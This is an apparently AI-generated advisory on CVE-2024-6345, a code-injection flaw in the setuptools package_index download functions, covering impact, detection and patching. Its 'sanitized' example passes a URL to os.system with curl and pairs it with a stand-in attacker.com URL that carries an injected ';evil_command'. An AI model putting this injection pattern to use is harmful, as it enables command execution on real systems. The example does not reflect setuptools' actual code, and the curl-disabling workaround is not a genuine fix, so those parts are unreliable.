CVE-2024-6345 Overview
A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.
Critical Impact
This vulnerability allows remote code execution, potentially leading to full system compromise.
Affected Products
- pypa/setuptools versions up to 69.1.1
- Not Available
- Not Available
Discovery Timeline
- Not Available - Vulnerability discovered by Not Available
- Not Available - Responsible disclosure to Not Available
- Not Available - CVE CVE-2024-6345 assigned
- Not Available - Not Available releases security patch
- 2024-07-15 - CVE CVE-2024-6345 published to NVD
- 2025-11-04 - Last updated in NVD database
Technical Details for CVE-2024-6345
Vulnerability Analysis
The vulnerability arises from insecure handling of URLs in the package_index module. This module fails to properly sanitize inputs, allowing malicious actors to inject arbitrary code via manipulated package URLs. The code execution occurs due to insufficient checks around what is executed during the download process.
Root Cause
Lack of input validation and sanitization when processing URLs leads to code injection.
Attack Vector
This vulnerability can be exploited over a network, where an attacker provides a specially crafted package URL, which then leads to code execution on the vulnerable system.
# Example exploitation code (sanitized)
import os
def download_package(url):
os.system(f"curl {url} -o package.zip")
# Malicious URL
malicious_url = "http://attacker.com/malicious?;evil_command"
download_package(malicious_url)
Detection Methods for CVE-2024-6345
Indicators of Compromise
- Unexpected network requests to untrusted sources
- Unusual process executions in conjunction with package installations
- Anomalies in package download paths
Detection Strategies
Utilize Endpoint Detection and Response (EDR) systems to monitor for suspicious behaviors such as curl being used to download executables or scripts. SentinelOne products can leverage behavioral AI to detect such anomalies.
Monitoring Recommendations
- Monitor network traffic for unexpected destinations.
- Audit system calls related to downloading and executing files.
- Maintain logs of executed commands during package installations.
How to Mitigate CVE-2024-6345
Immediate Actions Required
- Update to setuptools version 70.0 or later.
- Restrict execution permissions for non-trusted users.
- Implement strict input sanitization on all user-provided data.
Patch Information
Upgrade setuptools to version 70.0, where the vulnerability is patched. This removes the deprecated code paths susceptible to injection.
Workarounds
Isolate vulnerable systems from sensitive environments and apply network restrictions to minimize exposure.
# Configuration example
echo "127.0.0.1 attacker.com" >> /etc/hosts
chmod -x /usr/local/bin/curl
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
